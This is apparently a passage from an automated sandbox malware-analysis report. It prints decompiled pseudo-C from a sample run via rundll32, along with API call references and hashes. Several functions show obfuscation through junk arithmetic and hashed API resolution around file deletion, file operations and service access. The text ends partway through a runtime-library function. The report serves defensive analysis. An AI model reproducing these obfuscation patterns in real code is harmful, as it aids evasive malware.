CreateFileW.KERNELBASE(00210668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00210668,?,?,?,?), ref: 0020B5FD

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: e479d9e92eb06f6b92b6c295ab472c6bcaf63302d9b571fa45b14eec85ddf65c
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: EF11B272801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862160D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 10031EE4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 10026850: RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

_free.LIBCMT ref: 10031F53

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 63c190e782a930df499d5c4ba562356284b646d1a3ae318526816533ec7c08c4
Instruction ID: 5ecf24b48f6bf668a87eb7aba8164494cce5243ea809713a93c3c489f3a86baa
Opcode Fuzzy Hash: 63c190e782a930df499d5c4ba562356284b646d1a3ae318526816533ec7c08c4
Instruction Fuzzy Hash: F8012B72604356AFC321CF64D8819C9FBA8EB093B0F550739E559A76C0D770AC10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0021981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0021981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002107A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00219821
0x00219822
0x00219825
0x00219828
0x0021982a
0x0021982c
0x0021982f
0x00219832
0x00219835
0x00219836
0x00219837
0x0021983c
0x00219855
0x00219858
0x0021985f
0x00219866
0x0021986d
0x00219874
0x0021987b
0x0021988e
0x0021989b
0x002198a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002087F2,0000CAAE,0000510C,AD82F196), ref: 0021989B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1e0b3b29b646f7d0e1606feb7919bf061c8d5502ffa51adb977dc512f3fff550
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 52019A76801208FBDB04EFD5DC46CDFBFB9EF85310F108188F908A6260E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00217BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00217BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002107A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00217bf7
0x00217bf8
0x00217bfa
0x00217bfd
0x00217bff
0x00217c02
0x00217c06
0x00217c07
0x00217c0f
0x00217c1d
0x00217c25
0x00217c2d
0x00217c31
0x00217c38
0x00217c3f
0x00217c46
0x00217c4a
0x00217c5e
0x00217c67
0x00217c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00217C67

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: d344f00e1694a10d286d6e135df1b8abc9a0dcc9fedfede4f2fecf22f4df2348
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 93014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0020F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0020F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002107A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0020f662
0x0020f663
0x0020f665
0x0020f668
0x0020f66a
0x0020f66d
0x0020f670
0x0020f673
0x0020f677
0x0020f678
0x0020f67d
0x0020f687
0x0020f693
0x0020f69a
0x0020f6a1
0x0020f6a5
0x0020f6a9
0x0020f6b0
0x0020f6c9
0x0020f6d8
0x0020f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0020F6D8

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 1f29f7bcd036c7279cfb53c6f43e24235993aba29b77e948521cb30149014cd0
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 0001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10026850, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction ID: cee442b2a179b10d771ae8e348697f5776a900ac618982ed1d16fb6086920af7
Opcode Fuzzy Hash: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction Fuzzy Hash: F1F0B43560162566DB51DE66ED05B5A3798EB497A0BA24221BC04D71C4DE30FC0082E4

Uniqueness

Uniqueness Score: -1.00%

Function 0020B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0020602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002107A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0020b6f3
0x0020b6f8
0x0020b702
0x0020b70b
0x0020b712
0x0020b719
0x0020b720
0x0020b727
0x0020b72e
0x0020b747
0x0020b759
0x0020b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0020B759

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: cc174ef3deab07e40b75ab63fa77651ab33bce771fdd2a4b457eff0cb4b856e9
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: C6018BB694030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0021AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002107A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0021aa3f
0x0021aa40
0x0021aa41
0x0021aa44
0x0021aa47
0x0021aa4b
0x0021aa4c
0x0021aa51
0x0021aa5b
0x0021aa64
0x0021aa68
0x0021aa6f
0x0021aa76
0x0021aa8d
0x0021aa90
0x0021aa9d
0x0021aaa8
0x0021aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0021AAA8

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 794ffd2a89d5954a3218ce72c10f45cddcd0827985716f0d680deacba6a1b894
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 5EF069B591020CFFDF08DF94DD4A89EBFB5EB40304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000D717, Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000,?,10005B57,FFFFFFFF,1000528D), ref: 1000D748

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction ID: 6ae50cf1bc1ad4758d4872c1d4d64a6e8e48722a32411315d8df479ee4492f30
Opcode Fuzzy Hash: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction Fuzzy Hash: 8DF082362086569FAF02EE69AC4094E37E8EF017E07100526FA18D6198FB71D810CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00205FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00205FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002107A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00205fb5
0x00205fb6
0x00205fb7
0x00205fbb
0x00205fbc
0x00205fc1
0x00205fcb
0x00205fd7
0x00205fde
0x00205fe5
0x00205ffc
0x00205fff
0x00206006
0x0020600d
0x0020601a
0x00206025
0x0020602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00206025

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 76fbbdc28915d750aa5ebdd8dec519401d2efdf456955c9928a193752fe3b1b4
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: F6F04FB4C11208FFDB08DFA0E94689EBFB9EB40300F208198E409A7260E7B15F569F54

Uniqueness

Uniqueness Score: -1.00%

Function 10024214, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction ID: 48365c050a20ae6f6e82cadb15bda1ead02787d9cc2971144663992c1c58e65a
Opcode Fuzzy Hash: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction Fuzzy Hash: EFE06535640261D6E625EB67BD0174B3BF8EF823E0FD30160FE649A0D5DF64DC0495A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100079E0, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E100079E0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				signed int _v52;
				char* _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char* _v96;
				signed int _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				void* __ebx;
				intOrPtr _t404;
				signed int _t406;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				signed int _t422;
				signed int _t424;
				intOrPtr* _t427;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				signed int _t434;
				signed int* _t435;
				unsigned int _t446;
				signed char _t448;
				unsigned int _t449;
				signed char _t451;
				signed int _t457;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t496;
				signed int _t500;
				signed int _t507;
				signed int _t514;
				signed int _t519;
				signed int _t524;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed char _t543;
				signed int* _t547;
				signed int _t548;
				intOrPtr* _t550;
				signed int _t552;
				unsigned int _t559;
				signed char _t561;
				void* _t563;
				unsigned int _t568;
				signed char _t570;
				unsigned int _t577;
				signed char _t579;
				signed int _t583;
				void* _t586;
				char** _t614;
				void* _t618;
				void* _t622;
				intOrPtr* _t625;
				signed int _t627;
				signed int* _t632;
				signed int _t638;
				signed int _t642;
				void* _t655;
				signed char _t670;
				signed char _t673;
				char** _t678;
				void* _t681;
				intOrPtr* _t689;
				intOrPtr* _t692;
				signed int* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t700;
				signed int _t701;
				signed int _t706;
				signed int _t717;
				signed int _t719;
				signed int _t724;
				signed int _t726;
				signed int _t727;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t742;
				signed int _t745;
				signed int _t748;
				signed int _t750;
				signed int _t761;
				unsigned int _t762;
				signed int _t770;
				char** _t793;
				signed char _t811;
				void* _t830;
				signed int _t833;
				unsigned int _t844;
				signed int* _t853;
				signed int _t854;
				signed int _t855;
				signed int _t861;
				signed int _t863;
				void* _t864;
				signed int _t867;
				signed int _t868;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t875;
				signed int _t879;
				signed int _t881;
				void* _t884;

				_t404 =  *0x1004e004; // 0x0
				_t867 = 0;
				_v100 = _t404 -  *0x1004e008;
				_v20 = 0;
				_v16 = 0;
				_t406 = E1000C74B();
				_t853 = _a8;
				_t696 = _t406;
				_t697 =  *_t853;
				if(_t697 == 0) {
					L2:
					_v92 = _t867;
					L3:
					if(_t696 == 0xffff) {
						_t695 = _a4;
						_t695[1] = _t867;
						_t695[1] = 2;
						 *_t695 = _t867;
						return _t695;
					}
					__eflags = _t696 - 0xfffe;
					if(_t696 == 0xfffe) {
						E10007662(_t697, _a4, 1, _t853);
						return _a4;
					}
					__eflags = _t696 - 0xfffd;
					if(_t696 == 0xfffd) {
						_t692 = _a4;
						 *_t692 = _t697;
						 *(_t692 + 4) =  *(_t853 + 4);
						return _t692;
					}
					_t871 = _t696 & 0x00008000;
					__eflags = _t871;
					_v40 = _t871;
					if(_t871 == 0) {
						L98:
						E100077A0( &_v20, _t853);
						__eflags = _t871;
						if(_t871 != 0) {
							L104:
							__eflags = (_t696 & 0x0000fc00) - 0x7c00;
							if(__eflags != 0) {
								_t868 = _v40;
								_t872 = _t696;
								_t854 = _t696;
								__eflags = _t868;
								if(__eflags == 0) {
									_t855 = _t854 & 0x00006000;
									_t412 = 0;
									_t413 = _t412 & 0xffffff00 | __eflags == 0x00000000;
									_t873 = _t872 & 0x00001800;
									__eflags = _t873;
								} else {
									_t873 = _t872 & 0x00001800;
									__eflags = _t873 - 0x800;
									_t413 = 0 | _t873 == 0x00000800;
									_t855 = _t854 & 0x00006000;
								}
								__eflags = _t413;
								_v28 = _t855;
								_t700 = _t696;
								_t414 = _t696;
								if(_t413 == 0) {
									_t415 = _t414 & 0x00001000;
									_t701 = _t700 & 0x00000400;
									__eflags = _t701;
									_v40 = _t701;
									_v36 = _t415;
								} else {
									_t415 = _t414 & 0x00000400;
									_v40 = _t415;
									_v36 = _t700 & 0x00001000;
								}
								__eflags = _t415;
								if(_t415 == 0) {
									L117:
									__eflags = _t868;
									if(_t868 == 0) {
										__eflags = _t855;
									} else {
										__eflags = _t873 - 0x800;
									}
									__eflags = 0 | __eflags == 0x00000000;
									_t418 = _v40;
									if(__eflags == 0) {
										_t418 = _v36;
									}
									__eflags = _t418;
									if(_t418 == 0) {
										L125:
										__eflags = _t868;
										if(_t868 == 0) {
											__eflags = _t855;
										} else {
											__eflags = _t873 - 0x800;
										}
										__eflags = 0 | __eflags == 0x00000000;
										_t421 = _v40;
										if(__eflags == 0) {
											_t421 = _v36;
										}
										__eflags = _t421;
										if(_t421 == 0) {
											L141:
											__eflags = _t868;
											if(_t868 != 0) {
												goto L134;
											}
											__eflags = (_t696 & 0x00007c00) - 0x7800;
											if((_t696 & 0x00007c00) == 0x7800) {
												goto L223;
											}
											goto L143;
										} else {
											asm("sbb eax, eax");
											_t507 =  ~((_t696 & 0x00001b00) - 0x1200) + 1;
											_t745 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t507 & _t745;
											if((_t507 & _t745) == 0) {
												goto L141;
											}
											_v12 = "`template static data member destructor helper\'";
											_v8 = 0x2f;
											goto L133;
										}
									} else {
										asm("sbb eax, eax");
										_t514 =  ~((_t696 & 0x00001b00) - 0x1100) + 1;
										_t748 =  ~_t868;
										asm("sbb ecx, ecx");
										__eflags = _t514 & _t748;
										if((_t514 & _t748) == 0) {
											goto L125;
										}
										_v12 = "`template static data member constructor helper\'";
										_v8 = 0x30;
										goto L133;
									}
								} else {
									asm("sbb eax, eax");
									_t519 =  ~((_t696 & 0x00001b00) - 0x1000) + 1;
									_t750 =  ~_t868;
									asm("sbb ecx, ecx");
									__eflags = _t519 & _t750;
									if((_t519 & _t750) == 0) {
										goto L117;
									}
									_v12 = "`local static destructor helper\'";
									_v8 = 0x20;
									L133:
									E10007748( &_v20,  &_v12);
									__eflags = _t868;
									if(_t868 == 0) {
										L143:
										_t422 = 0;
										__eflags = _v28;
										L135:
										__eflags = _t422 & 0xffffff00 | __eflags == 0x00000000;
										_t424 = _v40;
										if(__eflags == 0) {
											_t424 = _v36;
										}
										__eflags = _t424;
										if(_t424 == 0) {
											L144:
											_t427 = E1000A3FB(_t696,  &_v48,  &_v20);
											goto L145;
										} else {
											_t863 = _t696 & 0x00001b00;
											__eflags = _t863 - 0x1100;
											_t496 = 0 | _t863 == 0x00001100;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t496 & _t742;
											if((_t496 & _t742) != 0) {
												L140:
												_t427 = E10007637(_t742,  &_v48, 0x20,  &_v20);
												L145:
												_v16 =  *((intOrPtr*)(_t427 + 4));
												_v20 =  *_t427;
												__eflags = _t868;
												if(__eflags == 0) {
													_t706 = _t696 & 0x00006000;
													_t429 = 0;
													_t430 = _t429 & 0xffffff00 | __eflags == 0x00000000;
													_t875 = _t696 & 0x00001800;
													__eflags = _t875;
													goto L148;
												}
												goto L146;
											}
											__eflags = _t863 - 0x1200;
											_t500 = 0 | _t863 == 0x00001200;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t500 & _t742;
											if((_t500 & _t742) == 0) {
												goto L144;
											}
											goto L140;
										}
									}
									L134:
									_t422 = 0;
									__eflags = _t873 - 0x800;
									goto L135;
								}
							}
							E1000CD6D(0x7c00, _t853, __eflags, _a4,  &_v20);
							L106:
							L107:
							_t435 = _a4;
							goto L224;
						}
						_t524 = _t696 & 0x00007c00;
						__eflags = _t524 - 0x6800;
						if(_t524 == 0x6800) {
							L103:
							E1000CDCE(_a4,  &_v20);
							goto L106;
						}
						__eflags = _t524 - 0x7000;
						if(_t524 == 0x7000) {
							goto L103;
						}
						__eflags = _t524 - 0x6000;
						if(_t524 != 0x6000) {
							goto L104;
						}
						_v12 = _v20;
						_v56 = "}\'";
						_v52 = 2;
						_v8 = _v16;
						E100077F7( &_v12, 0x7b);
						E10009E08(_t853,  &_v80, _t867);
						E10007684(E100076A6( &_v12,  &_v48,  &_v80), _a4,  &_v56);
						goto L107;
					} else {
						_t536 = _t696;
						_t761 = _t696 & 0x00001800;
						_v36 = _t761;
						__eflags = _t761 - 0x800;
						if(_t761 != 0x800) {
							_t537 = _t536 & 0x00001000;
							_v24 = _t696;
							_t25 =  &_v24;
							 *_t25 = _v24 & 0x00000400;
							__eflags =  *_t25;
							_v68 = _t537;
						} else {
							_t537 = _t536 & 0x00000400;
							_v68 = _t696;
							_v68 = _v68 & 0x00001000;
							_v24 = _t537;
						}
						__eflags = _t537;
						_t538 = _t696;
						if(_t537 == 0) {
							L16:
							_t539 = _t538 & 0x00001b00;
							__eflags = _t761 - 0x800;
							if(_t761 != 0x800) {
								_v60 = _v68;
								_t871 = _v40;
							} else {
								_v60 = _v24;
								_t853 = _a8;
							}
							__eflags = _v60 - _t867;
							if(_v60 == _t867) {
								L22:
								__eflags = _t696 & 0x00004000;
								if((_t696 & 0x00004000) != 0) {
									_t844 =  *0x1004e00c; // 0x0
